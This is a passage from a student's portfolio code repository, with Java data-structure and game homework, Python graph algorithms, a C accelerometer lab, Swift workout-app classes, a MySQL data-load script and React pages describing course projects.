}
else {
calledNext = true;
if(calledPrev == 2 || calledPrev == 1){
calledPrev = 0;
index++;
return cur.data;
}
else{
last = cur;
cur = cur.link;
index++;
return cur.data;
}
}
}
/**
* Returns true if this list iterator has more elements when traversing the list
* in the reverse direction.
* @return true if the list iterator has more elements when traversing the list in the reverse direction
*/
@Override
public boolean hasPrevious() {
// TODO
if (cur == head.link) {
return false;
}
else {
return true;
}
}
/**
* Returns the previous element in the list and moves the cursor position backwards.
* @return the previous element in the list
*/
@Override
public E previous() throws NoSuchElementException {
// TODO
calledAdd = false;
canRemove = true;
calledRemove = false;
if (cur == head.link && (calledPrev == 1 || calledPrev == 2)) {
throw new NoSuchElementException("Iteration has no previous element");
}
else {
calledPrev = 1;
if(calledNext){
calledNext = false;
index--;
return cur.data;
}
else{
last = cur;
cur = cur.prev;
index--;
return cur.data;
}
}
}
/**
* Returns the index of the element that would be returned by a subsequent call to next()
* @return he index of the element that would be returned by a subsequent call to next, or
* list size if the list iterator is at the end of the list
*/
@Override
public int nextIndex() {
// TODO
return index;
}
/**
* Returns the index of the element that would be returned by a subsequent call to previous().
* @return the index of the element that would be returned by a subsequent call to previous,
* or -1 if the list iterator is at the beginning of the list
*/
@Override
public int previousIndex() {
// TODO
if (index == 0) {
return -1;
} else {
return index - 1;
}
}
/**
* Removes from the list the last element that was returned by next() or previous()
*/
public void remove() throws IllegalStateException {
// TODO
if (canRemove && !calledAdd ) {
canRemove = false;
calledRemove = true;
if(calledPrev == 2 || calledPrev == 1){
ListNode toCur = cur.link;
unlink(cur);
cur = toCur;
}
if(calledNext){
ListNode toCur = cur.prev;
unlink(cur);
cur = toCur;
}
} else {
throw new IllegalStateException(
"You did not call next or previous, or you called add after you called next or previous");
}
}
/**
* Inserts the specified element into the list (optional operation). The element is
* inserted immediately before the element that would be returned by next(),
* if any, and after the element that would be returned by previous()
* @param e - the element to insert
*/
public void add(E obj) {
// TODO
if (isEmpty()) {
ListNode newNode = new ListNode(obj);
link(head, newNode);
index++;
}
else {
calledAdd = true;
if(calledNext){
ListNode newNode = new ListNode(obj);
link(cur, newNode);
cur = newNode;
index++;
}
if(calledPrev == 1 || calledPrev == 2){
ListNode newNode = new ListNode(obj);
link(cur.prev, newNode);
index++;
}
}
}
/**
* Replaces the last element returned by next() or previous() with the specified element
* @param e - the element with which to replace the last element returned by next or previous
*/
@Override
public void set(E obj) throws IllegalStateException{
// TODO
if (!calledRemove && !calledAdd && (calledPrev == 1 || calledNext)) {
ListNode replace = new ListNode(obj);
cur.data = replace.data;
}
else{
throw new IllegalStateException("Called remove() or add() after call to next or previous");
}
}
}
@Override
public boolean equals(Object obj) {
if (!linkedUTD)
updateLinked();
if ((obj == null) || !(obj instanceof List<?>))
return false;
List<?> list = (List<?>) obj;
if (list.size() != numItems)
return false;
Iterator<?> iter = list.iterator();
for (ListNode tmp = head.link; tmp != tail; tmp = tmp.link) {
if (!iter.hasNext())
return false;
Object t = iter.next();
if (!(t == tmp.data || t != null && t.equals(tmp.data)))
return false;
}
if (iter.hasNext())
return false;
return true;
} // equals
@Override
public Iterator<E> iterator() {
return new AdaptiveListIterator();
}
@Override
public ListIterator<E> listIterator() {
return new AdaptiveListIterator();
}
@Override
public ListIterator<E> listIterator(int pos) {
checkIndex2(pos);
return new AdaptiveListIterator(pos);
}
// Adopted from the List<E> interface.
@Override
public int hashCode() {
if (!linkedUTD)
updateLinked();
int hashCode = 1;
for (E e : this)
hashCode = 31 * hashCode + (e == null ? 0 : e.hashCode());
return hashCode;
}
// You should use the toString*() methods to see if your code works as
// expected.
@Override
public String toString() {
String eol = System.getProperty("line.separator");
return toStringArray() + eol + toStringLinked();
}
public String toStringArray() {
String eol = System.getProperty("line.separator");
StringBuilder strb = new StringBuilder();
strb.append("A sequence of items from the most recent array:" + eol);
strb.append('[');
if (theArray != null)
for (int j = 0; j < theArray.length;) {
if (theArray[j] != null)
strb.append(theArray[j].toString());
else
strb.append("-");
j++;
if (j < theArray.length)
strb.append(", ");
}
strb.append(']');
return strb.toString();
}
public String toStringLinked() {
return toStringLinked(null);
}
// iter can be null.
public String toStringLinked(ListIterator<E> iter) {
int cnt = 0;
int loc = iter == null ? -1 : iter.nextIndex();
String eol = System.getProperty("line.separator");
StringBuilder strb = new StringBuilder();
strb.append("A sequence of items from the most recent linked list:" + eol);
strb.append('(');
for (ListNode cur = head.link; cur != tail;) {
if (cur.data != null) {
if (loc == cnt) {
strb.append("| ");
loc = -1;
}
strb.append(cur.data.toString());
cnt++;
if (loc == numItems && cnt == numItems) {
strb.append(" |");
loc = -1;
}
} else
strb.append("-");
cur = cur.link;
if (cur != tail)
strb.append(", ");
}
strb.append(')');
return strb.toString();
}
}<file_sep>/src/ClassComponents/ComS311/Project2/q1.py
def longest_common_substring(s1, s2):
"""function for finding the LCS through recurison"""
cache = [[None for i in range(len(s2) + 1)] for j in range(len(s1) + 1)]
def recurse(s1, s2):
"""recursive helper function"""
if len(s1) == 0 or len(s2) == 0:
return ""
else:
a = s1[len(s1) - 1]
b = s2[len(s2) - 1]
if a == b:
if cache[len(s1)][len(s2)] != None:
return cache[len(s1)][len(s2)]
else:
s = recurse(s1[:len(s1) - 1], s2[:len(s2) - 1])
s = s + a
cache[len(s1)][len(s2)] = s
return s
if a != b:
one = None
two = None
if cache[len(s1) - 1][len(s2)] != None:
one = cache[len(s1) - 1][len(s2)]
else:
one = recurse(s1[:len(s1) - 1], s2)
cache[len(s1) - 1][len(s2)] = one
if cache[len(s1)][len(s2) - 1] != None:
two = cache[len(s1)][len(s2) - 1]
else:
two = recurse(s1, s2[:len(s2) - 1])
cache[len(s1)][len(s2) - 1] = two
if len(one) >= len(two):
return one
elif len(two) > len(one):
return two
return recurse(s1, s2)
s1 = "Look at me, I can fly!"
s2 = "Look at that, it's a fly"
s3 = "them"
s4 = "tim"
s5 = "abcdefghijklmnopqrstuvwxyz"
s6 = "ABCDEFGHIJKLMNOPQRSTUVWXYS"
s7 = "balderdash!"
s8 = "balderdash!"
s9 = "Solidandkeen\nSolidandkeen\nSolidandkeen\n"
s10 = "Whoisn'tsick\nWhoisn'tsick\nWhoisn'tsick"
lcs = longest_common_substring(s9, s10)
#print(lcs)
#print(repr(lcs))
print(longest_common_substring(s3, s4))<file_sep>/src/ClassComponents/CPRE185/Lab6/lab6.c
#include <stdio.h>
#include <math.h>
#define TRUE 1
double seconds(double ms);
int mag(double x, double y, double z);
int closeto(double tolerance, double point, double value);
double othermag(double x, double y, double z);
int main (){
double t;
double ax;
double ay;
double az;
double fallstart;
double fallstop;
double falltime;
double distance;
int num = 0;
int num2 = 0;
double newV = 0;
double oldT;
double newT;
double newD = 0;
double difference;
scanf("%lf,%lf,%lf,%lf", &t, &ax, &ay, &az);
printf("Ok im recieving data\n");
printf("Im waiting");
while (mag(ax, ay, az) == 0){
if ((num % 100) == 0){
printf(".");
}
scanf("%lf,%lf,%lf,%lf", &t, &ax, &ay, &az);
++num;
fflush(stdout);
}
printf("\n");
fallstart = t;
printf("help me! Im falling");
while (mag(ax, ay, az) == 1){
oldT = seconds(t);
if ((num2 % 100) == 0){
printf("!");
}
scanf("%lf,%lf,%lf,%lf", &t, &ax, &ay, &az);
++num2;
newT = seconds(t);
newV = newV + (9.8 * ((1 - othermag(ax, ay, az)) * (newT - oldT)));
newD = newD + (newV * (newT - oldT));
fflush(stdout);
}
printf("\n");
fallstop = t;
falltime = seconds(fallstop - fallstart);
distance = .5 * 9.8 * falltime * falltime;
difference = 100 - ((newD / distance) * 100);
printf("Ouch, I fell %lf meter in %lf seconds\n", distance, falltime);
printf("Compensating for air resistance, the fall was %lf meters.\n", newD);
printf("This is %lf percent less than computed before\n", difference);
}
double seconds(double ms){
double seconds;
seconds = ms / 1000;
return seconds;
}
int closeto(double tolerance, double point, double value){
if(tolerance > fabs(point - value)){
return 1;
}
else {
return 0;
}
}
int mag(double x, double y, double z){
double mag;
mag = sqrt((x * x) + (y * y) + (z * z));
if (closeto(.13, 1, mag) == 1){
return 0;
}
else {
return 1;
}
}
double othermag(double x, double y, double z){
double mag;
mag = sqrt((x * x) + (y * y) + (z * z));
return mag;
}<file_sep>/src/Components/WorkoutApp/ExerciseViewController.swift
//
// ExerciseViewController.swift
// workoutApp
//
// Created by <NAME> on 1/6/19.
// Copyright © 2019 <NAME>. All rights reserved.
//
import UIKit
import os.log
import CoreData
class ExerciseViewController: UIViewController {
//MARK: Instance Variables
private var exercises: [Exercise] = []
//MARK: Properties
@IBOutlet weak var name: UITextField!
@IBOutlet weak var reps0: UITextField!
@IBOutlet weak var reps1: UITextField!
@IBOutlet weak var reps2: UITextField!
@IBOutlet weak var reps3: UITextField!
@IBOutlet weak var weight0: UITextField!
@IBOutlet weak var weight1: UITextField!
@IBOutlet weak var weight2: UITextField!
@IBOutlet weak var weight3: UITextField!
@IBOutlet weak var endWorkout: UIButton!
@IBOutlet weak var nextExercise: UIButton!
override func viewDidLoad() {
super.viewDidLoad()
// Do any additional setup after loading the view.
}
//MARK: Acitons
@IBAction func nextExeriseButton(_ sender: UIButton) {
var reps: [Int] = [0,0,0,0]
var weights: [Int] = [0,0,0,0]
if reps0.text! != "" { reps[0] = Int(reps0.text!)! }
if reps1.text! != "" { reps[1] = Int(reps1.text!)! }
if reps2.text! != "" { reps[2] = Int(reps2.text!)! }
if reps3.text! != "" { reps[3] = Int(reps3.text!)! }
if weight0.text! != "" { weights[0] = Int(weight0.text!)! }
if weight1.text! != "" { weights[1] = Int(weight1.text!)! }
if weight2.text! != "" { weights[2] = Int(weight2.text!)! }
if weight3.text! != "" { weights[3] = Int(weight3.text!)! }
let exercise = Exercise(name: name.text!, reps: reps, weight: weights)
if exercise != nil {
exercises.append(exercise!)
name.text = ""
reps0.text = ""
reps1.text = ""
reps2.text = ""
reps3.text = ""
weight0.text = ""
weight1.text = ""
weight2.text = ""
weight3.text = ""
os_log("%@", exercise!.showName())
os_log("%@", exercise!.showReps())
os_log("%@", exercise!.showWeight())
}
}
@IBAction func endWorkout(_ sender: UIButton) {
let formatter : DateFormatter = DateFormatter()
formatter.dateFormat = "M/d/yyyy"
let date : String = formatter.string(from: NSDate.init(timeIntervalSinceNow: 0) as Date)
let workout = Workout(exercises: self.exercises, date: date)
Variables.workouts.append(workout!)
UserDefaults.standard.set(true, forKey: "appUsed")
//UserDefaults.standard.set(encodedData, forKey: "userWorkouts")
/*
guard let appDelegate = UIApplication.shared.delegate as? AppDelegate else { return }
let managedContext = appDelegate.persistentContainer.viewContext
let userEntity = NSEntityDescription.entity(forEntityName: "workouts", in: managedContext)!
let newUser = NSManagedObject(entity: userEntity, insertInto: managedContext)
newUser.setValue(Variables.workouts, forKey: "userWorkouts")
do { try managedContext.save() }
catch { print("Failed to save") }
*/
}
/*
// MARK: - Navigation
// In a storyboard-based application, you will often want to do a little preparation before navigation
override func prepare(for segue: UIStoryboardSegue, sender: Any?) {
// Get the new view controller using segue.destination.
// Pass the selected object to the new view controller.
}
*/
}
<file_sep>/src/Components/AWSAPI/config.java
package com.aws.codestar.projecttemplates.config;
import javax.sql.DataSource;
import org.springframework.boot.jdbc.DataSourceBuilder;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.ComponentScan;
import org.springframework.context.annotation.Configuration;
import org.springframework.context.annotation.PropertySource;
import org.springframework.transaction.annotation.EnableTransactionManagement;
import com.aws.codestar.projecttemplates.model.User;
@Configuration
@ComponentScan({ "com.aws.codestar.projecttemplates.config","com.aws.codestar.projecttemplates.dao" })
@PropertySource("classpath:application.properties")
@EnableTransactionManagement
public class config {
@Bean(name = "dataSource")
public DataSource datasource(){
return DataSourceBuilder.create()
.driverClassName("com.mysql.cj.jdbc.Driver")
.url("jdbc:mysql://test2.ciagitssmgru.us-east-2.rds.amazonaws.com:3306/test2")
.username("balex")
.password("<PASSWORD>")
.build();
}
}
<file_sep>/src/ClassComponents/ComS311/Project1/q1.py
def adapter_chain(adapters_info, charger_plug, wall_socket):
adapter_list = []
adj_list = adjacency_list(adapters_info)
parent = bfs_tree(adj_list, charger_plug)
return tree_path(parent, charger_plug, wall_socket, [])
def tree_path(parent, s, t, path):
start = s
if start == t:
path.append(s)
return path
else:
return tree_path(parent, start + 1, parent[t], path)
def adjacency_list(graph_str):
l = graph_str.splitlines()
edges = l[1:len(l)]
vertices = int(l[0].split()[1])
adj = []
for x in range(vertices):
nodeList = []
for y in range(len(edges)):
if int(edges[y].split()[0]) == x:
str = edges[y]
edgeTuple = (int(str.split()[1]), None)
nodeList.append(edgeTuple)
adj.append(nodeList)
return adj
def bfs_tree(adj_list, start):
vertices = len(adj_list)
parent = []
state = []
queue = []
for x in range(vertices):
parent.append(None)
state.append('U')
state[start] = 'D'
queue.append(start)
return bfs_loop(adj_list, queue, state, parent)
def bfs_loop(adj_list, queue, state, parent):
while(len(queue) != 0):
vertex = queue.pop(0)
for v in adj_list[vertex]:
if state[v[0]] == 'U':
state[v[0]] = 'D'
parent[v[0]] = vertex
queue.append(v[0])
state[vertex] = 'P'
return parent
str1 = "D 6\n0 4\n4 3\n4 1\n1 5\n1 2"
print (adapter_chain(str1, 0, 5))<file_sep>/src/Components/ComS319/ComS319.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import ProjectFiles from './assignment1.zip';
import GameMainJava from './GameMain.java';
import GameMainPNG from './GameMain.png';
import TicTacToe from './TicTacToe.java';
import TicTacToeSS1 from './TicTacToeSS1.png';
import TicTacToeSS2 from './TicTacToeSS2.png';
import UI1 from './UI1.png';
import UI2 from './UI2.png';
import UI3 from './UI3.png';
const Title = Typography.Title;
export default class ComS319 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Construction of User Interfaces - Com S 319</Title>
<Title level={2}>Tic-Tac-Toe Game in Java</Title>
<Title level={4}>Technology: Java, Eclipse</Title>
For this assignment, I was tasked with creating a tic-tac-toe game with a working UI
using any language of my choice. I chose Java because of my class experience with it.
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<img width='33%' src={UI1} alt=''/>
<img width='33%' src={UI2} alt=''/>
<img width='33%' src={UI3} alt=''/>
<Title level={4}>TicTacToe.java (click on image to download file)</Title>
<a href={TicTacToe} download="TicTacToe.java">
<img width='100%' src={TicTacToeSS1} alt=''/>
<img width='100%' src={TicTacToeSS2} alt=''/>
</a>
<Title level={4}>GameMain.java (click on image to download file)</Title>
<a href={GameMainJava} download="GameMain.java">
<img width='100%' src={GameMainPNG} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/Components/About/About.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import './About.css';
import photo from './composite2019.jpg';
const Title = Typography.Title;
export default class About extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={16}>
<Title level={1} className="title">Software Engineer</Title>
</Col>
</Row>
<Row justify="end">
<Col span={12}>
Hello, my name is <NAME> and I'm a student at Iowa State majoring in
Software Engineering and graduating in November. I have a passion for finding
creative software solutions to challenging problems and I'm eager to continue
my career doing what I enjoy.<br></br><br></br>
<Title level={4} className="title">Specialties:</Title>
iOS Development, Java Springboot, Google Cloud Platform, MySQL
<Title level={4} className="title">Familier With:</Title>
React.JS, .NET Framework, Python, Android Development
</Col>
<Col span={8}>
<img width='100%' src={photo} className="photo" alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS311/Project1/q4.py
def which_walkways(campus_map):
adj = adj_list(campus_map)
parent = prim(adj, 0)
result = []
for x in range(len(parent)):
if parent[x] != None:
if parent[x] <= x:
pair = (parent[x], x)
result.append(pair)
if parent[x] > x:
pair = (x, parent[x])
result.append(pair)
return result
def adj_list(graph):
l = graph.splitlines()
edges = l[1:len(l)]
vertices = int(l[0].split()[1])
adj = []
for x in range(vertices):
nodeList = []
for y in range(len(edges)):
data = edges[y].split()
if int(data[0]) == x:
edge = (int(data[1]), int(data[2]))
nodeList.append(edge)
if int(data[1]) == x:
edge = (int(data[0]), int(data[2]))
nodeList.append(edge)
adj.append(nodeList)
return adj
def prim(adj, s):
n = len(adj)
in_tree = [False] * n
distance = [float('inf')] * n
parent = [None] * n
distance[s] = 0
while all(in_tree) == False:
u = next_vertex(in_tree, distance)
in_tree[u] = True
for v, weight in adj[u]:
if (not in_tree[v]) and (weight < distance[v]):
distance[v] = weight
parent[v] = u
return parent
def next_vertex(in_tree, distance):
false_indexes = []
count = 0
for x in in_tree:
if x == False:
false_indexes.append(count)
count += 1
smallest = distance[false_indexes[0]]
smallest_index = false_indexes[0]
for x in false_indexes:
current = distance[x]
if current < smallest:
smallest = current
smallest_index = x
return smallest_index
str0 = "U 6 W\n0 3 3\n0 4 1\n0 1 3\n1 4 1\n3 4 1\n4 5 1\n1 5 3\n1 2 3\n2 5 1"
str1 = "U 3 W\n0 1 1\n2 1 2\n2 0 4"
str2 = "U 1 W"
str3 = "U 4 W\n0 1 1\n0 2 2\n0 3 4\n2 1 4\n2 3 1\n1 3 2"
print(sorted(which_walkways(str3)))<file_sep>/src/ClassComponents/ComS227/A1/TelevisonTest.java
package hw1;
import hw1.Television;
public class TelevisonTest {
public static void main(String[] args){
Television tv = new Television(5);
System.out.println(tv.getVolume());
tv.volumeUp();
System.out.println(tv.getVolume());
tv.volumeDown();
tv.volumeDown();
System.out.println(tv.getVolume());
tv.setChannel(2);
tv.channelDown();
tv.channelDown();
System.out.println(tv.getChannel());
tv.volumeUp();
tv.volumeUp();
tv.setChannel(3);
System.out.println(tv.getVolume());
System.out.println(tv.display());
tv.channelUp();
tv.channelUp();
System.out.println(tv.getChannel());
tv.channelDown();
System.out.println(tv.getChannel());
}
}<file_sep>/src/Components/ComS309/ComS309.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import FrontendFiles from './ShoelaceFrontend.zip';
import BackendFiles from './ShoelaceBackend.zip';
import ShoelacePoster from './ShoelacePoster.png';
import MainActivity1 from './MainActivity1.png';
import MainActivity2 from './MainActivity2.png';
import RedditRest1 from './RedditRest1.png';
import RedditRest2 from './RedditRest2.png';
import RedditRest3 from './RedditRest3.png';
import UserController1 from './UserController1.png';
import UserController2 from './UserController2.png';
import AppLogin from './AppLogin.png';
const Title = Typography.Title;
export default class ComS309 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Android Development Project - Computer Science 309</Title>
<Title level={4}>Technologies: Java, Android Studio, Springboot, MySQL, Iowa State Server</Title>
<li>Created an Android-based social media app called "Shoelace" in a team of four</li>
<li>Combined the user's main feed from Facebook, Twitter, and Reddit into a single feed within the app</li>
<li>Responsible for creating the frontend UI such as the login, main feed, add post, and settings</li>
<li>Communicated with the Facebook, Twitter and Reddit APIs' from the frontend to get the user's feed information</li>
<li>Communicated with our school's server instance to store user information such as login, friend, and posting information</li>
<li>Implemented the ability to post to any of the three social medias within the app</li>
<li>Used Java Springboot to build our app's backend API</li>
<li>Successfully used GIT to collaborate and develope with teammates</li>
<li>Used web sockets to implement a direct chatting feature</li>
<br></br>
<a href={FrontendFiles} download="Frontend_File.zip">Download Frontend Files</a>
<br></br>
<a href={BackendFiles} download="Backend_File.zip">Download Backend Files</a>
</Col>
</Row>
<Row justify="center">
<Col span={24}>
<img width='100%' src={ShoelacePoster} alt=''/>
<Title level={4}>MainActivity.java: Used for showing the main feed screen of the app</Title>
<img width='100%' src={MainActivity1} alt=''/>
<img width='100%' src={MainActivity2} alt=''/>
<Title level={4}>RedditRestClient.java: This allows a user to login to their Reddit account through Reddit's API using HTTP request methods</Title>
<img width='100%' src={RedditRest1} alt=''/>
<img width='100%' src={RedditRest2} alt=''/>
<img width='100%' src={RedditRest3} alt=''/>
<Title level={4}>AppLogin.java: Communicates with our server to retrieve the user's information for logging in</Title>
<img width='100%' src={AppLogin} alt=''/>
<Title level={4}>UserController: Server-side class that contains all the controller methods for the app</Title>
<img width='100%' src={UserController1} alt=''/>
<img width='100%' src={UserController2} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/Components/ComS363/projectInsert.sql
-- For our project, we used the import wizard to import the data. See the "Insert Data PDF for instructions".
use project;
SET FOREIGN_KEY_CHECKS = 0;
load data infile 'C:\ProgramData\MySQL\MySQLServer8.0\Uploads\mentioned.txt'
into table mentioned
FIELDS TERMINATED BY ';' OPTIONALLY ENCLOSED BY '"'
LINES TERMINATED BY '\n'
IGNORE 1 LINES
(tid,screen_name);
LOAD DATA INFILE 'C:\ProgramData\MySQL\MySQLServer8.0\Uploads\user.csv'
INTO TABLE useraccount
FIELDS TERMINATED BY ';' OPTIONALLY ENCLOSED BY '"'
LINES TERMINATED BY '\n'
IGNORE 1 LINES
(screen_name, name, subcategory, category, ofstate, numFollowers, numFollowing);
LOAD DATA INFILE 'C:\ProgramData\MySQL\MySQLServer8.0\Uploads\tweets.csv'
INTO TABLE tweet
FIELDS TERMINATED BY ';' OPTIONALLY ENCLOSED BY '"'
LINES TERMINATED BY '\n'
IGNORE 1 LINES
(tid,textbody,retweet_count,@col4,@col5,posting_user)
set day_posted= day(str_to_date(@col5, '%Y-%m-%d %H:%i:%s')),
month_posted= month(str_to_date(@col5, '%Y-%m-%d %H:%i:%s')),
year_posted= year(str_to_date(@col5, '%Y-%m-%d %H:%i:%s'));
LOAD DATA INFILE 'C:\ProgramData\MySQL\MySQLServer8.0\Uploads\urlused.csv'
INTO TABLE url
FIELDS TERMINATED BY ';' OPTIONALLY ENCLOSED BY '"'
LINES TERMINATED BY '\n'
IGNORE 1 LINES
(tid,url);
LOAD DATA INFILE 'C:\ProgramData\MySQL\MySQLServer8.0\Uploads\tagged.csv'
INTO TABLE hashtag
FIELDS TERMINATED BY ';' OPTIONALLY ENCLOSED BY '"'
LINES TERMINATED BY '\n'
IGNORE 1 LINES
(tid,hashtag_name);
SET FOREIGN_KEY_CHECKS = 1;<file_sep>/src/ClassComponents/CPRE185/Lab7/Lab7.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import lab7C from './lab7.c';
import ProjectFiles from './Lab7.zip';
import lab7output from './lab7output.PNG';
import lab7SS1 from './lab7SS1.png';
import lab7SS2 from './lab7SS2.png';
const Title = Typography.Title;
export default class Lab7 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Accelerometer Tilt Visualization - Lab 7</Title>
<Title level={4}>Technology: C, Arduino Esplora</Title>
For this lab we had to use the accelerometer data coming from a Arduino Esplora to make a
horizontal oriented bar graph of the magnitude of the pitch and the roll. To do this we used
characters L and R. We needed to use the buttons on the Esplora to switch between pitch
and roll, and we needed to use another button to stop the program.
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>lab7.c (click on image to download file)</Title>
<a href={lab7C} download="lab7.c">
<img width='100%' src={lab7SS1} alt=''/>
<img width='100%' src={lab7SS2} alt=''/>
</a>
<Title level={4}>Example Output</Title>
<img width='100%' src={lab7output} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/Components/WorkoutApp/Workout.swift
//
// Workout.swift
// workoutApp
//
// Created by <NAME> on 1/16/19.
// Copyright © 2019 <NAME>. All rights reserved.
//
import Foundation
class Workout {
private var exercises: [Exercise] = []
private var date: String
init?(exercises: [Exercise], date: String){
self.date = date
self.exercises = exercises
}
func showDate() -> String {
return date
}
func showExercises() -> [Exercise] {
return exercises
}
}
<file_sep>/src/Components/WorkoutApp/WorkoutApp.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import Exercise from './Exercise.png';
import ExerciseSwift from './Exercise.swift';
import ExerciseModel from './ExerciseModel.png';
import ExerciseVC from './ExerciseViewController.swift';
import ExerciseViewSS1 from './ExerciseViewSS1.png';
import ExerciseViewSS2 from './ExerciseViewSS2.png';
import HistoryDetails from './HistoryDetails.png';
import HistoryPage from './HistoryPage.png';
import HistoryView from './HistoryView.png';
import HistoryViewController from './HistoryViewController.swift';
import Home from './Home.png';
import Storyboard from './Storyboard.png';
import Workout from './Workout.swift';
import WorkoutModel from './WorkoutModel.png';
import WorkoutView from './WorkoutView.png';
import WorkoutViewController from './WorkoutViewController.swift';
import ProjectFiles from './workoutApp.zip';
const Title = Typography.Title;
export default class WorkoutApp extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>iOS Development - Workout App</Title>
<Title level={4}>Technology: Swift, Xcode</Title>
I had previously used android for a class project (ComS 309) so I leveraged that experienced
to make an iOS app. For this project, I made a workout app that someone can use to
start a workout, track exercises, and later view the workouts in a history page.
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<img width='50%' src={Home} alt=''/>
<img width='50%' src={Exercise} alt=''/>
<br></br>
<img width='50%' src={HistoryPage} alt=''/>
<img width='50%' src={HistoryDetails} alt=''/>
<Title level={4}>Storyboard showing the screen flow</Title>
<img width='100%' src={Storyboard} alt=''/>
<Title level={4}>ExerciseViewController.swift (click on image to download file):</Title>
<a href={ExerciseVC} download="ExerciseViewController.swift">
<img width='100%' src={ExerciseViewSS1} alt=''/>
<img width='100%' src={ExerciseViewSS2} alt=''/>
</a>
<Title level={4}>HistoryViewController.swift (click on image to download file):</Title>
<a href={HistoryViewController} download="HistoryViewController.swift">
<img width='100%' src={HistoryView} alt=''/>
</a>
<Title level={4}>WorkoutViewController.swift (click on image to download file):</Title>
<a href={WorkoutViewController} download="WorkoutViewController.swift">
<img width='100%' src={WorkoutView} alt=''/>
</a>
<Title level={4}>Exercise.swift (click on image to download file):</Title>
<a href={ExerciseSwift} download="Exercise.swift">
<img width='100%' src={ExerciseModel} alt=''/>
</a>
<Title level={4}>Workout.swift (click on image to download file):</Title>
<a href={Workout} download="Workout.swift">
<img width='100%' src={WorkoutModel} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS228/Project1/DNASequence.java
package edu.iastate.cs228.hw1;
/*
* @author <NAME>
*/
public class DNASequence extends Sequence {
/**
* Creates a sequence object and uses the isValidLetter() method to check
* if every char- acter in the array sarr is valid. If so, it makes and keeps
* a copy of the array sarr in the field seqarr of type char[]. Otherwise,
* it throws an IllegalArgumentException.
* @param dnaarr
*/
public DNASequence(char[] dnaarr) {
super(dnaarr);
}
/**
* The method returns true if the character argument is equal to one
* of the eight characters ’a’, ’A’, ’c’, ’C’, ’g’, ’G’, ’t’ and ’T’. otherwise
* it returns false
* @param a given character
* @return true if it's valid, false otherwise
*/
@Override
public boolean isValidLetter(char let) {
if(let == 'a' || let == 'A' || let == 'c' || let == 'C' || let == 'g' || let == 'G' || let == 't' || let == 'T'){
return true;
}
else{
return false;
}
}
/**
* The method produces the reverse complement of the DNA sequence
* saved in the char array seqarr, and returns a char array with the resulting sequence
* @return char array that is the reverse complement
*/
public char[] getReverseCompSeq() {
char[] reverse = new char[seqarr.length];
char[] clone = getSeq();
for(int i = 0; i < clone.length; i++){
reverse[i] = clone[clone.length - 1 - i];
}
for(int i = 0; i < reverse.length; i++){
if(reverse[i] == 'A'){
reverse[i] = 'T';
}
else if(reverse[i] == 'C'){
reverse[i] = 'G';
}
else if(reverse[i] == 'G'){
reverse[i] = 'C';
}
else if(reverse[i] == 'T'){
reverse[i] = 'A';
}
else if(reverse[i] == 'a'){
reverse[i] = 't';
}
else if(reverse[i] == 'c'){
reverse[i] = 'g';
}
else if(reverse[i] == 'g'){
reverse[i] = 'c';
}
else if(reverse[i] == 't'){
reverse[i] = 'a';
}
}
return reverse;
}
/**
* The method calls getReverseCompSeq() and saves the result in a
* temporary array and then copies the array back into the char array seqarr
*/
public void reverseComplement() {
char[] temp = getReverseCompSeq();
seqarr = temp;
}
}
<file_sep>/src/ClassComponents/ComS227/A4/SnakeHead.java
package hw4;
import java.awt.Color;
import main.Config;
import graph.Cell;
import state.Snake;
import state.SnakeSegment;
import state.State;
/**
* An impassable state that follows the mouse's position or moves randomly if it can't
* move towards the mouse. If it still cannot move, the game ends. If the snake can move,
* it replaces its current cell with a SnakeSegment before moving. If it finds Food,
* it increments its length. Uses the default snake variables. An "S" in the map file.
* @author <NAME>
*
*/
public class SnakeHead implements State, Snake{
/**
* holds the value of the length of the Snake
*/
private int length;
/**
* holds the value of the timer
*/
private int timer;
/**
* Makes a new SnakeHead that initializes the timer to 0 and the length to 4
*/
public SnakeHead(){
timer = 0;
length = 4;
}
/**
* Gets the length of the snake
* @return the length
*/
public int getLength(){
return length;
}
/**
* Updates the cell based off of the state. This method can update the cell's state,
* or potentially another cell's state depending on the implementation. If the timer
* is greater than or equal to MAX_SNAKE_TIMER then the snake will try to find a random
* cell closer to the mouse, using the appropriate method of the Cell class.
* If no such cell exists, it will then try to find any random open cell. If no
* such second cell exists, then the player loses the game. Also if the next cell is
* food then the length is incremented
* @param cell - The cell that this state belongs to
*/
public void handle(Cell cell){
timer++;
if(timer >= Config.MAX_SNAKE_TIMER){
timer = 0;
Cell nextCell = cell.getRandomCloser();
if(nextCell == null){
nextCell = cell.getRandomOpen();
}
if(nextCell != null && nextCell.getState() != null && (nextCell.getState().toChar() == 'F' || nextCell.getState().toChar() == 'D')){
length++;
}
if(nextCell != null){
cell.moveState(nextCell);
cell.setState(new SnakeSegment(this));
}
if(nextCell == null){
Config.endGame(length);
}
}
}
/**
* Get the current color of the state (can be used for drawing).
* @return the color of the state
*/
public java.awt.Color getColor(){
return new Color(0,255,255);
}
/**
* Get whether or not the cell is passable. Affects whether or not a state can move
* through another state via random movement or moving closer to the mouse.
* @return true if the state is passable
*/
public boolean isPassable(){
return false;
}
/**
